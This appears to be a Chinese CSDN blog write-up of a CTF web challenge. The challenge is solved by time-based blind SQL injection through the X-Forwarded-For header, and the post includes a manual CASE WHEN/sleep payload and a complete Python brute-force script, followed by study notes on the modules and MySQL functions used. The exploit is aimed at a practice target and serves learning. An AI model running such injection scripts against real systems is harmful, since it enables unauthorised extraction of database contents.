web安全

最新推荐文章于 2022-08-22 15:59:01 发布
最新推荐文章于 2022-08-22 15:59:01 发布
阅读量252 收藏 1
点赞数
分类专栏: WEB安全 文章标签: python web 基于时间型的盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lun_hui95/article/details/78152448
版权

CTF实验吧 who are you?

  • 题目

    这里写图片描述

  • firefox浏览器

    这里写图片描述

  • X-Forwarded-For 用浏览器插件Modify Hearers修改

    这里写图片描述

  • 发现IP值变了

    这里写图片描述

  • 基于时间型的SQL盲注,利用X-Forwarded-For注入
  • 手工调试,X-Forwared-For: ” ‘+(select case when ascii(substring((select flag from flag ) from 1 for 1 )) > 99 then sleep(5) else 1 end ) and ‘1’=’1”(为什么不用if流程函数,而用case when then else end 流程函数,原因是网站会截断逗号后的所有字符,有兴趣可以试试)

    这里写图片描述

  • 经过测试,当>98延迟返回,>99不延迟返回,得flag第一个字符的ASCII值为99,即c

    这里写图片描述

  • 参考http://blog.csdn.net/qq_35078631/article/details/54773769
  • 附上python代码运行得到flag
#!/usr/bin/env python     
#-*-coding:utf-8-*-       #告诉系统使用UTF-8编码,或#coding=utf-8

import requests           #引入requests模块
import string             #引入string模块
url="http://ctf5.shiyanbar.com/web/wonderkun/index.php"    #URL(统一资源定位符)web地址
payload=string.lowercase+string.uppercase+string.digits    #小写字母+大写字母+数字
flag=""                   #字符串

for i in range(1,100):    #迭代1到100之间的数字
    havetry=0             #赋值
    for str in payload:   #遍历字符串
        headers={"x-forwarded-for":"' +(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(7) else 1 end ) and '1'='1" %(i,str)}      #联合查询语句
        try:              #异常处理,把可能发错的的语句放在try下
            res=requests.get(url,headers=headers,timeout=6)#定制请求头和设置超时时间
        except requests.exceptions.ReadTimeout, e:         #超时错误
            havetry=1     # 赋值
            flag = flag + str                              #符合条件的字母存在flag中
            print "flag:", flag                            #打印flag
            break                                          #找到第i个字符,退出第二个for循环,开始第一个for循环,找 第i+1个字符
    if havetry==0:                                         #当所有字符遍历完,退出第一个for循环结构
        break
print 'result:' + flag                                     #程序结束打印flag

  • 运行结果
    这里写图片描述

    学习笔记

  • requests模块

    requests.get(url,headers=headers,timeout=”)发送一个get请求设置超时时间
    requests.exceptions.ReadTimeout 请求超时错误
    参考网址: http://www.cnblogs.com/tangdongchu/p/4229049.html
    官 网: http://docs.python-requests.org/en/latest/user/quickstart/

    http://docs.python-requests.org/en/latest/api/#requests.ReadTimeout

  • string模块

    string.lowercase小写字母,string.uppercase大写字母,string.digits数字

    参考网址:http://blog.csdn.net/jb19900111/article/details/19637421

  • MySQL支持流程函数

    1.IF(value,t,f)
    如果value为真,返回t,否则返回f
    2.IFNULL(value1,value2)
    如果value1不为空返回value1,否则返回value2
    3.CASE WHEN [value1] THEN[result1]…ELSE[default] END
    如果value1为真,返回result1,否则返回default
    4.CASE [expr] WHEN[value1] THEN[result]…ELSE[default] END
    如果expr等于value1,返回result,否则返回defalut
    5.程序里语句分析
    (select case when (substring((select flag from flag ) from %d for 1 )=’%s’) then sleep(7) else 1 end ) and ‘1’=’1” %(i,str)
    substring(str,x,y) 返回字符串 str 中从位置起 y 个字符串长度的字符串
    %(i,str)python字符串格式化,%d格式化整数,%s格式化字符串
    sleep()强制产生一个固定的延迟,类似BENCHMARK(N,expression)
    整句意思:从flag表中查询flag第 i 个长度为 1 的字符串与str比较,为真时强制产生7秒延迟否则1秒

  • try….except….else 语句

    将可能出错的语句放入try模块下,except后如果没有指定异常,则会默认所有异常,当没有异常时,执行else后面语句

    参考地址:http://www.cnblogs.com/Lival/p/6203111.html

lun_hui95
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全(easytornado)
m0_56010012的博客
03-02 618
打开题目给出的网址,有三个文件,一个挨着一个看。对于第一个flag.txt,按照页面中示例的,可以知道flag在/flllllllllag目录中,并且页面需要填写filehash值,猜测一下为MD5值。 当我们直接在url后面添加/fllllllllllllag,时,网页跳转到下个页面,猜测是模板注入。 验证是否为模板注入,构建msg={{2}} 继续打开welcome.txt。 hints.txt:可以看到,页面需要的filehash(MD5)为cookie_secret+
python sql注入漏洞 ctf_CTF 中的 SQL 注入总结
weixin_39641334的博客
12-09 844
flag 常见表1select flag from flagSQL 注入的基本原理123select * from user where username='' and pass=''# 构造 username=devnull' or '1后,sql 语句变成select * from user where username='devnull' or '1' and pass=''SQLMap1p...
bugku-INSERT INTO注入(XFF时间注入) writeup
xuchen16的博客
09-30 6239
网址:http://120.24.86.145:8002/web15/ 题目给了源码 error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip = ...
CTF中Web找Flag题目(1)
热门推荐
TLXX1126的博客
07-13 3万+
今天做的一个题,题目上给了一个链接,链接是一个网页,网页上让输入一个pass key, 做题步骤是先用BP抓包,然后repeter看返回包 其中Content-Row是一个用base64加密过的一串字符,然后将其解码便得到了pass key 听火种CTF中胖虎大佬讲解是这么说的: 这个功能就是抓包和看返回包的过程 就跟你要看一个网站,你就得把你的IP地址各种请求告诉网站,
buu练题记录16-[羊城杯 2020]easyre&[FlareOn1]Bob Doge
Asteri5m
02-28 288
0x00 [羊城杯 2020]easyre oxoo1 查壳 无壳,64位程序,用IDA64打开 0x02 IDA64 用ida分析可以轻松发现加密的字符串以及验证模式 三次比较简单的加密 0x03 exp import base64 from string import digits, ascii_lowercase, ascii_uppercase flag = '' str2 = "EmBmP5Pmn7QcPU4gLYKv5QcMmB3PWHcP5YkPq3=cT6QckkPckoRG" #
Web安全漏洞加固手册 V2.0
03-17
Web安全漏洞加固手册 V2.0
web安全爆破字典bp.txt
最新发布
10-28
web安全-抓包字典
WEB安全深度剖析.pdf
07-05
Web安全深度剖析》总结了当前流行的高危漏洞的形成原因、攻击手段及解决方案,并通过大量的示例代码复现漏洞原型,制作模拟环境,更好地帮助读者深入了解Web 应用程序中存在的漏洞,防患于未然。 《Web安全深度...
WEB安全入门基础.pptx
08-24
WEB 安全入门基础 本资源摘要信息主要关注 WEB 安全入门基础,涵盖了 WEB 安全的基本概念、HTTP 协议、加密算法、DOS 命令、信息收集、渗透测试等方面的知识点。 WEB 安全入门基础 WEB 安全入门基础主要包括 WEB ...
CTF练习——WEB安全(BurpSuite为主)
zytjulie的博客
08-22 2879
CTF训练,WEB安全,Burpsuite部分
mysql注入ctf_CTF SQL注入
weixin_42510026的博客
01-28 644
一、宽字节注入原理:GBK编码、URL转码利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ASCII码要大于128,才到汉字的范围)例如:' -> ' -> %5C%27%df' -> %df' -> %df%5C%27sql字符集特性MYSQL 中 utf8_unicode_ci 和 utf8_general...
CTF中常见注入题源码及脚本分析
weixin_30659829的博客
07-30 499
1.代码审计发现 这里没有用escape_string,因此存在注入。 1 function show($username){ 2 global $conn; 3 $sql = "select role from `user` where username ='".$username."'"; 4 $res = $conn ->query($sql); ...
经过Nginx代理后如何区分HTTP请求头中的X-Forwarded-For和X-Real-IP,以及Java示例
dichengyan0013的博客
07-15 929
在开发工作中,我们常常需要获取客户端的IP。一般获取客户端的IP地址的方法是:request.getRemoteAddr();但是在通过了Apache,Squid等反向代理软件就不能获取到客户端的真实IP地址了。 原因:由于在客户端和服务之间增加了中间代理,因此服务器无法直接拿到客户端的IP,服务器端应用也无法直接通过转发请求的地址返回给客户端。 现在图示代理上网和IP的关系: ...
CTF 中的 SQL 注入总结
重新启程
10-12 4824
flag 常见表 1 select flag from flag SQL 注入的基本原理 1 2 3 select * from user where username='' and pass='' # 构造 username=devnull' or '1后,sql 语句变成 select * from us...
Ctfhub之SQL注入|SQL报错注入及原理详解
tempulcc的博客
10-10 1487
手工测试sql注入及原理1、SQL 整数型注入查数据库名查数据表查flag表字段2、字符型注入3、报错注入updatexml() 函数致MYSQL显错注入原理updatexml() 函数定义updatexml() 函数运行机制updatexml() 函数运行示例不报错示例构造报错利用updatexml()测试ctfhub的显错注入 1、SQL 整数型注入 查数据库名 -1 union select group_concat(schema_name),2 from information_schema.sch
WEB安全知识总结(入门级)
flag_zhang的博客
03-05 577
不全,欢迎大家补充
Web安全CTF 题初级试练
土豆回锅的博客
01-19 3万+
最近在整理一些CTF题,觉得很有意思,觉得有必要一下!CTF对题目说明很重要,请务必重视! 1.Robot 熟悉web的人,看到题目应该想起robots协议,也被称为爬虫协议、机器人协议,网站通过robots协议告诉搜索引擎,哪些页面可以抓取,哪些页面不能抓取。 当一个网页爬虫爬去站点时,它会首先检查该站点根目录下是否存在robots.txt,如果存在,搜索机器人就会按照该文件中的内容来确定
ctfshow 做题 MISC入门 模块 21~30
Goodric的博客
08-25 2065
ctfshow 做题 MISC入门 模块 21~30 —— misc21 题目描述: flag在序号里。 同样查看附件图片的 exif 信息。 看到序列号处有一串数字: 686578285826597329 16 进制转字符 得到:hex(X&Ys) 得到了一条提示,对 X、Y 进行 hex ,即十进制转十六进制。 刚刚的 exif 信息里也可以看到 X、Y 的值。 依次对四个值进行进制转换,最终组合得到 flag 。 ctfshow{e8a221498d5c073b4084eb51b1a16
WEB安全编程技术规范详解
"该文档是WEB安全编程技术规范的详细指南,旨在帮助开发人员和代码审计人员遵循最佳实践,防止常见的网络安全威胁。它涵盖了OWASP TOP10中的关键问题,并针对JAVA和PHP的安全编程提供了具体建议和解决方案。" 在WEB...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值